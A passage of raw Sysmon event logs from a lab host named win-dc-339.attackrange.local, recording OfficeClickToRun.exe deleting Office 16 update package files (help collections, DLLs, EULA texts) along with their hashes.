Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_ONLINE_COL.HXTMD5=0827B6E99C76D96D8ABE252E7358770F,SHA256=AF42B323D583568AFBFD69FA53F337BE492F51545455C63040C5FBA8CC8CFB5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_ONLINE_COL.HXCMD5=CBC1BC9655715E6A4EB810AA7969449C,SHA256=F63C2F0BB0A3622E2D5147AB1FDEC607F3DCD4C5B3299490B320C15853DB299C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_ONLINE.HXSMD5=25F254D0F17E2C19928E2CFC04BFEB7E,SHA256=575ED1BBB4A2CDEB75C915203E5CE79DFF49CD4AABA73F5D6D580E914327B58C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_COL.HXTMD5=12905F0525B7029D285E893723C04D69,SHA256=55396F6BBCDD649BD4A94CF14D1E73559BA70DD5B3E5745EDACC215BAA8EBFE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_COL.HXCMD5=7EA89C0D3180F91DFFB17FA0935DD58F,SHA256=3651F9849D78DCBFE53A395AACEA1C6140FF9ED9C97BA31473C4D77BFD8B2F20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_BASIC_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_BASIC_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_BASIC_COL.HXTMD5=DB2F4C1E766BD92BA024D99484647BA5,SHA256=BC54D8B8D1A2B44E657D154DFD43CBBD9D31DAB7B70C3B8D4121213D6368A3F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_BASIC_COL.HXCMD5=BA775ACB0FABE82DB1F0CA1D1CB35F79,SHA256=FB3ABA054AB92A28EFB8B24E95E11F3EF2010AF98094150234A6ED97BF625F6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC_BASIC.HXSMD5=7544BEAE0A73854DD108D00E1C8C8781,SHA256=EF92F30A61EC5CD4A41E3BEB99F2B3B6F9FC0BFC13D1C17544BCC207544B6664,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LyncVDI_Eula.txtMD5=57D661D897D3220520512D4767F35FC2,SHA256=D7E36C35E42C0799A87131320B174682A74DF7B0CAE2C51C6128FDC8255D54C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\lyncDesktopResources.dllMD5=A97D6BC43617EFADA5924BAFA7D98D1C,SHA256=154D77F1BADA4125E2CAD0D1E468E6077241DAA3078253C2F04A443D8562DC43,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LyncBasic_Eula.txtMD5=9DC106E2FA19D2B6D663CC89E935EDC6,SHA256=4DD8E741C8232A238CF8C2C83514DC2E694E13FC2B2D88B8E2A7CF7BA73E0B51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LYNC.HXSMD5=3C3217B8BCC4D87D6D7252D27AE814D9,SHA256=915A24F6FDCC7421E96B5BC9849534DFBD9E4A2A982492237C5E282EB3B9DC2D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\Invite or Link.oneMD5=EA1101CD06181E9BEDCA640A7CF4517A,SHA256=2CEEFE8ABAF43487A4C3B88E7325C477014C27BA336F317D7FB9741C802902D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\IFDPINTL.DLLMD5=39C7403C10A8EADF618C74329763BC17,SHA256=A56F57B813CCEAD7E889D7DC3388CA35B7CA9ED457FFED4061773E70A30BDB0A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRLEX.DLLMD5=C3BB28C392AFBAF6069FBD9AAC8A5E9A,SHA256=22DB446B7B2CC65E229582CCA8D4E410725FD0AF473EF22DD1294964A645417F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRINTL32.DLLMD5=7B65E815A5669035A3FEB39174E1F50D,SHA256=14EEFB40F9558548E005B03517839BA0D8B430F57FCA0D6AE557E0DF063ADEB7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRAPH_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRAPH_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRAPH_COL.HXTMD5=0431FA92DD9D0B224B740D40D55CEFF6,SHA256=42B64E6605285505D0CAA7073A7C3D7205EEEFEA512B0B6A9FB65D2C9F3B91AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRAPH_COL.HXCMD5=878911C6C99612300889691E20298A74,SHA256=C17E3F9D31721D9F57D49ACD7623BAA269FDD4BF8D9A3F61575E112CD3F06B20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRAPH.HXSMD5=28090B5DCDA44E5B93554AAEDA0ACBD3,SHA256=4DEADFF881455BCDD4B64F309F8478845FE5DCF738B903797F5A4A917278E31D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GR8GALRY.GRAMD5=BDCA0FDD95D739A849EA4CA4D0D4FBD1,SHA256=3FE7DEEE976B7173B376EB91D408918A246543C2D7F5B4D0737280BC48A4B208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXPTOOWS.XLAMD5=AA51651888A889EC23B06E266888FAE1,SHA256=8160C8E315D2B0399D886CC0E7A44FB494AA4A58B30AB15E9D3561667B61E2B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXPTOOWS.DLLMD5=3121BE6384DEFAA1AF14A0CB19F21710,SHA256=F2837E78577FAB284A715E688676A5D2120D14416AA52657A2BF254DD7C6F91E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXCEL_WHATSNEW.XMLMD5=13520ED38CE4B991082D676D8E44D702,SHA256=780075B899D9BA70E3058DEF63446CB27616581652B9DEF598DE28DC1C7DA081,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXCEL_K_COL.HXKMD5=DB9742E49C49C505B293A84518E95FA5,SHA256=1C17B95E5098ADB0C0E06AAC8A8C7C50C6A5EF1B696465D548C8A922F1D3A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXCEL_F_COL.HXKMD5=B8FBBC73DDDE31636552AB184B4E398F,SHA256=3C3702253A4695B5BCB18A2565B1D49F9F32F5F9F2442FD1395197970FA34EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXCEL_COL.HXTMD5=400015616311620544662F434941CC50,SHA256=B37F3BCDCDEEC6291B7D1CDF3A3FD2708B212A01428576E02BB53ADBB47C0A64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXCEL_COL.HXCMD5=0EAB28E12F1E6DF41B9E946EA79C53EE,SHA256=DB7E4ED3F202733F3B96A5F2301A2DDF0E427E275312FA76185FFEA0C6942170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ExcelNaiveBayesCommandRanker.txtMD5=EC89C08FA0F7065DF11D9E4603B7E9DF,SHA256=FC36E6D7DA109A8FDBFC93E3CD720DC97F6F2A298CB36C81A62131F8BD55AC90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXCEL.HXSMD5=22B96D9CEE3843641484EB3BF444A12F,SHA256=DC35237EE78ECF761AF8ECE07932DD240ABCCE6A478219B154295761EDD2F1A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ENVELOPR.DLLMD5=75044F64B1DF1C31E7D3A3A905657265,SHA256=69F5A736DDE1F5FE60081AFA23E880D75FBDBB16A7A6309554A69D6725BB269A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EntityPickerIntl.dllMD5=E7F7015B778BBE5F05DFFF6F2459CFA4,SHA256=748FAA99F7FC9894BB6E482C913DC6423D6B541A39B91D843C7A46BB8EB01B0A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\CT_ROOTS.XMLMD5=F343E48E929ED23D88B519955E1C56A2,SHA256=8AE1B7B720DF3D9B76D146A1858CB65927EEE190401808359CF84B6CBDAE9DAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\CLVWINTL.DLLMD5=7313E0EA57282DA80AB72558A1882312,SHA256=34A5F25E730E9F292D24766EEADDB79299A3CA24F628893E34024E49FDBE3605,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\client_eula.txtMD5=E54D75D1D2848859500030E6A1BF5D5C,SHA256=1CCF3568A7ED6215816A612749FEFA8E3785E7F783937DF782AA3EAB8FEB5919,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientVolumeLicense_eula.txtMD5=1460EE599525B4C721792440FE369FB6,SHA256=1301B81DB0FC9ED37B74BD14B721D176C80F4125E130812CFAFCD9E178A7C897,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientVolumeLicense2019_eula.txtMD5=CDBD2B3CC1E92E7CD6F697A89A9C134F,SHA256=579C7B14A68B8C90E1F40EFCE29488AAF4C42A61F68E3BE1B4B0908E7E53EDEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientSub_M365_eula.txtMD5=DBDADD520A224854DAE2B0DFA044788A,SHA256=5147EB65E7B771B1CD24D2233574D7C5615F74A7D15D44E4E72DD606A34A9493,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientSub_eula.txtMD5=55FAB09147C83C6183D8C8DEB466DE07,SHA256=F8DA1604C9FC26FFA2D849E669D693A5625070ED220985680160037B3B04C687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientSub2019_eula.txtMD5=AC154D8A3B1315E61E5905FC6FCF547D,SHA256=07FB57B9DD876615FED4EFCD8A0F138E69C935E952B87FF2F4115125E06A88AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 